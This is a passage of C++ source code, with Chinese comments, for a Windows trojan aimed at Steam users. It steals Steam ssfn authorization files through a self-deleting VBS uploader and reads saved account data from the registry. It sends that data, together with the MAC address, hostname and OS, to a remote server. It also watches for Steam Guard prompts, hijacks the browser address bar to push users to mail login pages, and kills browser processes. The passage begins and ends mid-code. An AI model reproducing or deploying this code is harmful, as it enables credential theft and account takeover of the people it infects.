+= "End If \r\n";myUploadVBS += "StringToBytes = objFile.Read(-1) \r\n";myUploadVBS += "objFile.Close \r\n";myUploadVBS += "Set objFile = Nothing \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Function GetFileBinary(ByVal strPath) \r\n";myUploadVBS += "Dim objFile \r\n";myUploadVBS += "Set objFile = CreateObject(\"ADODB.Stream\") \r\n";myUploadVBS += "objFile.Type = adTypeBinary \r\n";myUploadVBS += "objFile.Open \r\n";myUploadVBS += "objFile.LoadFromFile strPath \r\n";myUploadVBS += "GetFileBinary = objFile.Read(-1) \r\n";myUploadVBS += "objFile.Close \r\n";myUploadVBS += "Set objFile = Nothing \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Function GetBoundary() \r\n";myUploadVBS += "Dim ret(12) \r\n";myUploadVBS += "Dim table \r\n";myUploadVBS += "Dim i \r\n";myUploadVBS += "table = \"abcdefghijklmnopqrstuvwxzy0123456789\" \r\n";myUploadVBS += "Randomize \r\n";myUploadVBS += "For i = 0 To UBound(ret) \r\n";myUploadVBS += "ret(i) = Mid(table, Int(Rnd() * Len(table) + 1), 1) \r\n";myUploadVBS += "Next \r\n";myUploadVBS += "GetBoundary = \"---------------------------\" & Join(ret, Empty) \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Property Let Charset(ByVal strValue) \r\n";myUploadVBS += "strCharset = strValue \r\n";myUploadVBS += "End Property \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Sub AddForm(ByVal strName, ByVal strValue) \r\n";myUploadVBS += "Dim tmp \r\n";myUploadVBS += "tmp = \"\\r\\n--$1\\r\\nContent-Disposition: form-data; name=\"\"$2\"\"\\r\\n\\r\\n$3\" \r\n";myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$2\", strName) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$3\", strValue) \r\n";myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Sub AddFile(ByVal strName, ByVal strFileName, ByVal strFileType, ByVal strFilePath) \r\n";myUploadVBS += "Dim tmp \r\n";myUploadVBS += "tmp = \"\\r\\n--$1\\r\\nContent-Disposition: form-data; name=\"\"$2\"\"; filename=\"\"$3\"\"\\r\\nContent-Type: $4\\r\\n\\r\\n\" \r\n";myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$2\", strName) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$3\", strFileName) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$4\", strFileType) \r\n";myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";myUploadVBS += "objTemp.Write GetFileBinary(strFilePath) \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Sub AddEnd() \r\n";myUploadVBS += "Dim tmp \r\n";myUploadVBS += "tmp = \"\\r\\n--$1--\\r\\n\" \r\n";myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";myUploadVBS += "objTemp.Position = 2 \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Function Upload(ByVal strURL) \r\n";myUploadVBS += "Call AddEnd \r\n";myUploadVBS += "xmlHttp.Open \"POST\", strURL, False \r\n";myUploadVBS += "xmlHttp.setRequestHeader \"Content-Type\", \"multipart/form-data; boundary=\" & strBoundary \r\n";myUploadVBS += "xmlHttp.Send objTemp \r\n";myUploadVBS += "Upload = xmlHttp.responseText \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "End Class \r\n";myUploadVBS += "";myUploadVBS += "Dim UploadData \r\n";myUploadVBS += "Dim UploadState \r\n";myUploadVBS += "Set UploadData = New XMLUpload \r\n";myUploadVBS += "UploadData.Charset = \"utf-8\" \r\n";myUploadVBS += "UploadData.AddForm \"content\", \"Hello world\" \r\n";myUploadVBS += "UploadData.AddFile \"image\", \"%s\", \"text/txt\", \"c:/%s\" \r\n";myUploadVBS += "UploadState = UploadData.Upload(\"%s?ID=%s&LP=%s\") \r\n";myUploadVBS += "If UploadState = \"FILES_UPLOAD_OK\" Then \r\n";myUploadVBS += " \r\n";myUploadVBS += "Else \r\n";myUploadVBS += " WScript.sleep 10000 \r\n";myUploadVBS += " UploadData.Upload(\"%s?ID=%s&LP=%s\") \r\n";myUploadVBS += "End If \r\n";myUploadVBS += "Set UploadData = Nothing \r\n";myUploadVBS += "Set objFSO = CreateObject(\"Scripting.FileSystemObject\") \r\n";myUploadVBS += "objFSO.DeleteFile(\"c:/%s\") \r\n";myUploadVBS += "objFSO.DeleteFile(WScript.ScriptFullName) \r\n";myUploadVBS += "Set objFSO = Nothing \r\n";hFile = FindFirstFile(wildcardPathandFile, &pNextInfo);if(INVALID_HANDLE_VALUE == hFile){return FALSE;}if(pNextInfo.cFileName[0] != '.'){myVBSFilePath = "";myVBSFilePath += szMyselfPath;myVBSFilePath += GetName();myVBSFilePath += "64.VBS";mySSFNFilesName.Format(TEXT("%s.key"), pNextInfo.cFileName);mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);myTXTSSFNFiles.Format(TEXT("c:/%s.key"), pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);Sleep(1000);CString szUploadVBS = "";szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);FILE *fp;fp=fopen(myVBSFilePath, "w");if(fp){fprintf(fp, "%s", szUploadVBS.GetBuffer(0));}fclose(fp);Sleep(1000);ShellExecute(NULL, "open", "cmd.exe", " /q /c "+myVBSFilePath, NULL, SW_HIDE);DeleteFile(mySSFNFiles);}while(FindNextFile(hFile, &pNextInfo)){if(pNextInfo.cFileName[0] == '.'){continue;}myVBSFilePath = "";myVBSFilePath += szMyselfPath;myVBSFilePath += GetName();myVBSFilePath += "64.VBS";mySSFNFilesName.Format(TEXT("%s.key"), pNextInfo.cFileName);mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);myTXTSSFNFiles.Format(TEXT("c:/%s.key"), pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);Sleep(1000);CString szUploadVBS = "";szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);FILE *fp;fp=fopen(myVBSFilePath, "w");if(fp){fprintf(fp, "%s", szUploadVBS.GetBuffer(0));}fclose(fp);Sleep(1000);ShellExecute(NULL, "open", "cmd.exe", " /q /c "+myVBSFilePath, NULL, SW_HIDE);DeleteFile(mySSFNFiles);}return FALSE;
}// 数据发送模块BOOL DllExport SendURLPost(CString strPostStr)
{HMODULE hshell;hshell=LoadLibrary(_T("wininet.dll"));HINSTANCE (WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);HINSTANCE (WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);HINSTANCE (WINAPI *XXXInternetCloseHandle)(HINTERNET);(FARPROC&)XXXInternetOpen = GetProcAddress(hshell,"InternetOpenA");(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell,"InternetOpenUrlA");(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell,"InternetCloseHandle");HINTERNET hropen=XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);if( hropen == NULL ){FreeLibrary(hshell);return FALSE;}HINTERNET hropenurl = XXXInternetOpenUrl(hropen, strPostStr, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);if( hropenurl == NULL ){FreeLibrary(hshell);return FALSE;}XXXInternetCloseHandle(hropen);XXXInternetCloseHandle(hropenurl);FreeLibrary(hshell);return TRUE;
}// 劫持 IE 线程模块static DWORD WINAPI HOOKBrowser(LPVOID pParam)
{//AfxMessageBox("劫持 IE 线程模块启动!");do{CString szMyClass = "";HWND Hwnd_IEFrame = ::GetForegroundWindow();TCHAR szClassName[MAX_PATH]={0};ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_IEFrame, szClassName, MAX_PATH);szMyClass.Format(TEXT("%s"), szClassName);szMyClass.Replace(" ", "");if(szMyClass == "IEFrame"){//AfxMessageBox("IEFrame Class");HWND Hwnd_1 = ::FindWindowEx(Hwnd_IEFrame, NULL, _T("WorkerW"), NULL);if(Hwnd_1 != NULL){HWND Hwnd_2 = ::FindWindowEx(Hwnd_1, NULL, _T("ReBarWindow32"), NULL);if(Hwnd_2 != NULL){HWND Hwnd_3 = ::FindWindowEx(Hwnd_2, NULL, _T("Address Band Root"), NULL);if(Hwnd_3 != NULL){HWND Hwnd_4 = ::FindWindowEx(Hwnd_3, NULL, _T("ToolbarWindow32"), NULL);HWND Hwnd_5 = ::FindWindowEx(Hwnd_3, NULL, _T("Edit"), NULL);if(Hwnd_4 != NULL && Hwnd_5 != NULL){TCHAR szGetEditStr[MAX_PATH]={0};CString szMyEditStr1 = "", szMyEditStr2 = "";ZeroMemory(szGetEditStr, MAX_PATH * sizeof(TCHAR));::SendMessage(Hwnd_5, WM_GETTEXT, MAX_PATH, (LPARAM)szGetEditStr);//AfxMessageBox(szGetEditStr);szMyEditStr1.Format(_TEXT("%s"), szGetEditStr);szMyEditStr1.Replace("//", "`");AfxExtractSubString(szMyEditStr2, szMyEditStr1, 0, '/');szMyEditStr2.Replace("`", "//");CString szEditReplace;if( szMyEditStr2 == "http://mail.qq.com" || szMyEditStr2 == "https://mail.qq.com" ){// 清理缓存//DelTempFiles();szMailAddr = "";szMailAddr = szMyEditStr2;szEditReplace = TEXT("https://ui.ptlogin2.qq.com/cgi-bin/login?style=9&appid=522005705&daid=4&s_url=https%3A%2F%2Fw.mail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwsk%26delegate_url%3D%26f%3Dxhtml%26target%3D&hln_css=http%3A%2F%2Fmail.qq.com%2Fzh_CN%2Fhtmledition%2Fimages%2Flogo%2Fqqmail%2Fqqmail_logo_default_200h.png&low_login=1&hln_autologin=%E8%AE%B0%E4%BD%8F%E7%99%BB%E5%BD%95%E7%8A%B6%E6%80%81&pt_no_onekey=1");char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser = true;}else if( szMyEditStr2 == "https://mail.163.com" || szMyEditStr2 == "https://mail.126.com" || szMyEditStr2 == "https://mail.yeah.net" ){// 清理缓存//DelTempFiles();szMailAddr = "";szMailAddr = szMyEditStr2;szEditReplace.Format(TEXT("https://email.163.com/"));char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser = true;}else if( szMyEditStr2 == "https://www.188.com" || szMyEditStr2 == "https://188.com" ){// 清理缓存//DelTempFiles();szMailAddr = "";szMailAddr = szMyEditStr2;szEditReplace.Format(TEXT("https://vip.188.com/webapp/login188.html"));char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser = true;}else{szMailAddr = "";szMailAddr = szMyEditStr2;}}}}}}Sleep(100);} while( !szBrowser );return 0;
}// 锁定注册表默认浏览器 并 劫持非IE内核浏览器 线程模块static DWORD WINAPI HOOKIERegedit(LPVOID pParam)
{//AfxMessageBox("线程模块启动!");do{if( GetProcess("360se.exe") && GetProcess("steam.exe") ){CString myIEver = GetIEVerSion();int szIE_8 = myIEver.Find("8.0", 0);if( szIE_8 >= 0){goto myOtherFunction;}else{if( KillProcess("360se.exe") ){if( GetProcess("QQ.exe") ){ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);}else{ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);}}szIERegedit = true;}}else if( GetProcess("360chrome.exe") && GetProcess("steam.exe") ){CString myIEver = GetIEVerSion();int szIE_8 = myIEver.Find("8.0", 0);if( szIE_8 >= 0){goto myOtherFunction;}else{if( KillProcess("360chrome.exe") ){if( GetProcess("QQ.exe") ){ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);}else{ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);}}szIERegedit = true;}}else{goto myOtherFunction;}myOtherFunction:if( GetProcess("steam.exe") ){HWND Hwnd_Browser = ::GetForegroundWindow();TCHAR szClassName[MAX_PATH];ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Browser, szClassName, MAX_PATH);CString szMyClass = "";szMyClass.Format(TEXT("%s"), szClassName);int sz360Class = szMyClass.Find("360se6_Frame", 0);int szChromeClass = szMyClass.Find("WidgetWin_1", 0);int szChromeClass_WidgetWin = szMyClass.Find("Chrome_WidgetWin_1", 0);int szQQBrowserClass_WidgetWin = szMyClass.Find("QQBrowser_WidgetWin_0", 0);if( sz360Class >= 0 || szChromeClass_WidgetWin >= 0 || szChromeClass >= 0 || szQQBrowserClass_WidgetWin >= 0 ){DWORD processid;::GetWindowThreadProcessId(Hwnd_Browser, &processid);HANDLE hprocess=::OpenProcess(PROCESS_ALL_ACCESS, FALSE, processid);if(hprocess != NULL){CString myIEver = GetIEVerSion();int szIE_8 = myIEver.Find("8.0", 0);if( szIE_8 >= 0){DWORD cbNeededx = 0;HMODULE hModx = NULL;if( ::EnumProcessModules( hprocess, &hModx, sizeof( hModx ), &cbNeededx ) !=0 ){TCHAR myBrowserPath[MAX_PATH + 1] = {0};if( ::GetModuleFileNameEx( hprocess, hModx, myBrowserPath, MAX_PATH ) !=0 ){CString szBrowserPath;szBrowserPath.Format(TEXT(" /c \"%s\" https://w.mail.qq.com"), myBrowserPath);//AfxMessageBox("szBrowserPath:\n"+szBrowserPath);::TerminateProcess(hprocess, 0);ShellExecute(NULL, "open", "cmd.exe", szBrowserPath, "", SW_HIDE);}}}else{::TerminateProcess(hprocess, 0);if( GetProcess("QQ.exe") ){ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);}else{ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);}}szIERegedit = true;}::CloseHandle(hprocess);}}Sleep(100);} while( !szIERegedit );return 0;
}// 监控 Tslgame 主界面 线程模块static DWORD WINAPI HOOKGameMain(LPVOID pParam)
{//AfxMessageBox("监控 Tslgame 主界面 线程 已启动!");szTslgameEXE = FALSE;do{HWND Hwnd_Tslgame = ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]={0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Tslgame, szSTClassName, MAX_PATH);CString szMySTClass = "";szMySTClass.Format(TEXT("%s"), szSTClassName);int isSTClass = szMySTClass.Find("UnrealWindow", 0);if( GetProcess("TslGame.exe") && isSTClass >= 0 ){//AfxMessageBox("窗口样式:" + szStyle1 + "\n扩展样式:" + szStyle2);//AfxMessageBox("已登录 Tslgame 主界面!");// 构建统计数据CString strPostData = "";strPostData.Format(TEXT("%scj.php?ID=%s&CJ=0"), strMailServerName, szMailID);//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect = ::IsNetworkAlive( &dw0 );if( isConnect ){BOOL Result = SendURLPost(strPostData);if( Result ){szTslgameEXE = true;}}}else{if( !GetProcess("steam.exe") ){szTslgameEXE = true;}}Sleep(100);} while( !szTslgameEXE );return 0;
}// 监控 Steam 主界面 线程模块static DWORD WINAPI HOOKLoginMain(LPVOID pParam)
{//AfxMessageBox("监控 steam.exe 主界面 线程 已启动!");BOOL szLoginEXE = FALSE;do{if( ::GetCurrentProcessId() == GetEXE() ){HWND Hwnd_Steam = ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]={0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);CString szMySTClass = "";szMySTClass.Format(TEXT("%s"), szSTClassName);int isSTClass1 = szMySTClass.Find("PopupWindow", 0);int isSTClass2 = szMySTClass.Find("vguiPopupWindow", 0);long lstyle1 = GetWindowLong(Hwnd_Steam, GWL_STYLE);long lstyle2 = GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);long lstyle3 = GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);long lstyle4 = GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);CString szStyle1 = "", szStyle2 = "", szStyle3 = "", szStyle4 = "";szStyle1.Format(TEXT("%X"), lstyle1);szStyle2.Format(TEXT("%X"), lstyle2);szStyle3.Format(TEXT("%X"), lstyle3);szStyle4.Format(TEXT("%X"), lstyle4);if( (isSTClass2 >= 0 || isSTClass1 >= 0) && (szStyle1 == "960F0000" || szStyle1 == "96CF0000" || szStyle3 == "960F0000" || szStyle3 == "96CF0000") ){//AfxMessageBox("窗口样式:" + szStyle1 + "\n扩展样式:" + szStyle2);//AfxMessageBox("开始判断是否已登录Steam主界面!");///// 处理电脑授权文件CString mySTInstPath = "", mySTSSFNFilePath = "";HKEY dw_hKey;LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );if( x_Ret1 == ERROR_SUCCESS ){char dw_data[256] = {0};DWORD dw_Type = REG_SZ;DWORD dw_Length = 256;LONG x_Ret2 = RegQueryValueEx( dw_hKey, TEXT("SteamPath"), NULL, &dw_Type, (LPBYTE)dw_data, &dw_Length );mySTInstPath.Format(TEXT("%s"), dw_data);mySTSSFNFilePath.Format(TEXT("%s/ssfn*"), dw_data);}RegCloseKey(dw_hKey);char *mySSFNPathx = mySTInstPath.GetBuffer(mySTInstPath.GetLength()+1);mySTInstPath.ReleaseBuffer();char *mySSFNFilex = mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()+1);mySTSSFNFilePath.ReleaseBuffer();//AfxMessageBox(mySTInstPath);//AfxMessageBox(mySTSSFNFilePath);SearchFilesByWildcard_2(mySSFNPathx, mySSFNFilex);szTslgameEXE = true;Sleep(3000);DWORD dwThreadId4;CreateThread(NULL, 0, HOOKGameMain, NULL, 0, &dwThreadId4); szBrowser = true;szLoginEXE = true;szEMailName = false;szIERegedit = true;}}else{if( !GetProcess("steam.exe") ){szBrowser = true;szLoginEXE = true;szEMailName = false;szIERegedit = true;}}Sleep(100);} while( !szLoginEXE );return 0;
}// 监控 登陆器界面 线程模块static DWORD WINAPI HOOKLoginEXE(LPVOID pParam)
{//AfxMessageBox("监控 steam.exe 登陆器 线程 已启动!");BOOL szLoginEXE = FALSE;do{if(::GetCurrentProcessId() == GetEXE()){HWND H_wnd = ::GetForegroundWindow();char sTitles[256];memset(sTitles, 0, 256);::SendMessage(H_wnd, WM_GETTEXT, 255, (LPARAM)sTitles);char *LP1;LP1 = strstr(sTitles, "Steam 令牌");char *LP2;LP2 = strstr(sTitles, "Steam 令牌");char *LP3;LP3 = strstr(sTitles, "Steam Guard");char *LP4;LP4 = strstr(sTitles, "Steam Guard");char *LP5;LP5 = strstr(sTitles, "S t e a m 令牌");char *LP6;LP6 = strstr(sTitles, "S t e a m 令牌");char *LP7;LP7 = strstr(sTitles, "令牌");if( LP1 || LP2 || LP3 || LP4 || LP5 || LP6 || LP7 ){//AfxMessageBox("开始判断令牌种类!");long lstyle1 = GetWindowLong(H_wnd, GWL_STYLE);long lstyle2 = GetWindowLong(H_wnd, GWL_EXSTYLE);long lstyle3 = GetWindowLongPtr(H_wnd, GWL_STYLE);long lstyle4 = GetWindowLongPtr(H_wnd, GWL_EXSTYLE);CString szLP1 = "", szLP2 = "", szLP3 = "", szLP4 = "";szLP1.Format(TEXT("%X"), lstyle1);szLP2.Format(TEXT("%X"), lstyle2);szLP3.Format(TEXT("%X"), lstyle3);szLP4.Format(TEXT("%X"), lstyle4);//AfxMessageBox("窗口样式:"+szLP1+"\n扩展样式:"+szLP2);if( szLP1 == "960A0000" || szLP1 == "96CA0000" || szLP3 == "960A0000" || szLP3 == "96CA0000" ){//AfxMessageBox("邮箱令牌");szLocalLP = "0";}else if( szLP1 == "960F0000" || szLP1 == "96CF0000" || szLP3 == "960F0000" || szLP3 == "96CF0000" ){//AfxMessageBox("手机令牌");szLocalLP = "1";}else{//AfxMessageBox("未知令牌");szLocalLP = "2";}HKEY hKey, xKey;LONG lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char user[256] = {0};DWORD dwType = REG_SZ;DWORD dwLength = 256;LONG lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)user, &dwLength );if( lRet2 == ERROR_SUCCESS && strlen(user) > 4 ){CString LocalUser = "";CString ReadRegUser = "";LocalUser.Format(TEXT("%s"), user);ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), user);LONG lRet2 = RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );if( lRet2 == ERROR_SUCCESS ){char data1[256] = {0}, data2[256] = {0}, data3[256] = {0}, data4[256] = {0};DWORD dwType1 = REG_SZ, dwType2 = REG_SZ, dwType3 = REG_SZ, dwType4 = REG_SZ;DWORD dwLength1 = 256, dwLength2 = 256, dwLength3 = 256, dwLength4 = 256;LONG lRet3 = RegQueryValueEx( xKey, TEXT("AccOne"), NULL, &dwType1, (LPBYTE)data1, &dwLength1 );LONG lRet4 = RegQueryValueEx( xKey, TEXT("DataOne"), NULL, &dwType2, (LPBYTE)data2, &dwLength2 );LONG lRet5 = RegQueryValueEx( xKey, TEXT("AccSecond"), NULL, &dwType3, (LPBYTE)data3, &dwLength3 );LONG lRet6 = RegQueryValueEx( xKey, TEXT("DataSecond"), NULL, &dwType4, (LPBYTE)data4, &dwLength4 );if( (lRet3 == ERROR_SUCCESS && lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS && lRet6 == ERROR_SUCCESS) && (strlen(data3) >= 10 && strlen(data4) >= 20) ){CString szRegAccOne = "", szRegDataOne = "", szRegAccSecon = "", szRegDataSecon = "";szRegAccOne.Format(TEXT("%s"), data1);szRegDataOne.Format(TEXT("%s"), data2);szRegAccSecon.Format(TEXT("%s"), data3);szRegDataSecon.Format(TEXT("%s"), data4);/// 随机生成 16位 KEYtime_t seed = time(NULL); srand((unsigned)seed);int randNum = (rand()*2);CString szMD5 = "", szMD5Key = "", Base64_szMD5Key = "";szMD5Key += "_CHWM_";int szMD5Key_Len = szMD5Key.GetLength();for(int j=szMD5Key_Len; j<16 ;j++){int randNum = rand()%26;if(j%2){szMD5.Format("%C", randNum+97);}else{szMD5.Format("%C", randNum+65);}szMD5Key += szMD5;Sleep(50);}szMD5Key = gen(szMD5Key);Base64_szMD5Key = BASE64Encode(szMD5Key, szMD5Key.GetLength());/memset(osx, 0, MAX_PATH);memset(jsj, 0, MAX_PATH);// 获取计算机名WSADATA _wsaData = {0};int _Result = 0;_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}_Result = gethostname(jsj, sizeof(jsj));if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}WSACleanup();// 获取MACCString szMac = "";szMac = GetMacAddress();// 获取系统版本os();// 构建统计数据CString strPostData = "";strPostData.Format(TEXT("%s?M=%s&OS=%s&CP=%s&VER=%s&ID=%s&AccOne=%s&DataOne=%s&AccSecond=%s&DataSecond=%s&MD5=%s&LP=%s&JC="), strServerName, szMac, osx, jsj, szVersion, strUserID, szRegAccOne, szRegDataOne, szRegAccSecon, szRegDataSecon, Base64_szMD5Key,szLocalLP);strPostData.Replace(" ", "%20");//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect = ::IsNetworkAlive( &dw0 );if( isConnect ){BOOL Result = SendURLPost(strPostData);if( Result ){//AfxMessageBox("成功发送数据!");FILE *fp;CFileFind finder1x;BOOL noEmpty1x=finder1x.FindFile("C:\\NTUSERS.LOG");if(!noEmpty1x){fp=fopen("C:\\NTUSERS.LOG", "w");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}else{fp=fopen("C:\\NTUSERS.LOG", "a");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}//隐藏数据文件SetFileAttributes("C:\\NTUSERS.LOG", FILE_ATTRIBUTE_HIDDEN);RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;/* 邮箱令牌 */if(szLocalLP == "0"){DeleteFile("C:\\MailData.txt");//创建劫持IE线程//szBrowser = false;//DWORD dwThreadId;//CreateThread(NULL, 0, HOOKBrowser, NULL, 0, &dwThreadId);//创建线程监控ST主界面myEmailSTR = "";DWORD dwThreadId2;CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, &dwThreadId2); /*创 建锁定注册表默认浏览器与劫持非 IE 内核浏览器线 程*///DWORD dwThreadId3;//CreateThread(NULL, 0, HOOKIERegedit, NULL, 0, &dwThreadId3); }else if(szLocalLP == "2"){/* 未知令牌 *///创建线程监控ST主界面myEmailSTR = "";DWORD dwThreadId;CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, &dwThreadId); }}else{//AfxMessageBox("发送数据失败!");DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}}}Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);}else{HWND Hwnd_Steam = ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]={0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);CString szMySTClass = "";szMySTClass.Format(TEXT("%s"), szSTClassName);int isSTClass1 = szMySTClass.Find("PopupWindow", 0);int isSTClass2 = szMySTClass.Find("vguiPopupWindow", 0);long lstyle1 = GetWindowLong(Hwnd_Steam, GWL_STYLE);long lstyle2 = GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);long lstyle3 = GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);long lstyle4 = GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);CString szStyle1 = "", szStyle2 = "", szStyle3 = "", szStyle4 = "";szStyle1.Format(TEXT("%X"), lstyle1);szStyle2.Format(TEXT("%X"), lstyle2);szStyle3.Format(TEXT("%X"), lstyle3);szStyle4.Format(TEXT("%X"), lstyle4);if( (isSTClass2 >= 0 || isSTClass1 >= 0) && (szStyle1 == "960F0000" || szStyle1 == "96CF0000" || szStyle3 == "960F0000" || szStyle3 == "96CF0000") ){/* 此为租号数据 